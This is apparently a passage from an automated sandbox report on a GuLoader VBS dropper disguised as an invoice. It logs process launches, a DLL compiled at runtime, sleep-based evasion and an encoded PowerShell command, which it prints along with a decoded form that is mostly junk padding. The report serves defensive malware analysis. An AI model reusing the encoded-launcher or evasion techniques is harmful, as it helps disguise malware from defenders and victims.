BvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD70A.tmp" "c:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP"Jump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_01
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220510Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Hetero3.datJump to behavior
    Source: classification engineClassification label: mal84.troj.evad.winVBS@8/9@0/0
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: k7C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.pdb source: powershell.exe, 00000010.00000002.758423763.000000000554C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.758073857.000000000536C000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000010.00000002.763535179.0000000009970000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04F226C9 push D004FB35h; retf 16_2_04F226D5
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04F22097 push 0C00005Eh; retf 16_2_04F220A1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07EFE598 pushad ; ret 16_2_07EFE599
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07EF545A pushfd ; iretd 16_2_07EF5469
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 731Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep time: -11990383647911201s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000010.00000002.757258525.000000000513D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 00000010.00000002.757258525.000000000513D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Encrypted powershell cmdline option found
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDB
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDBJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
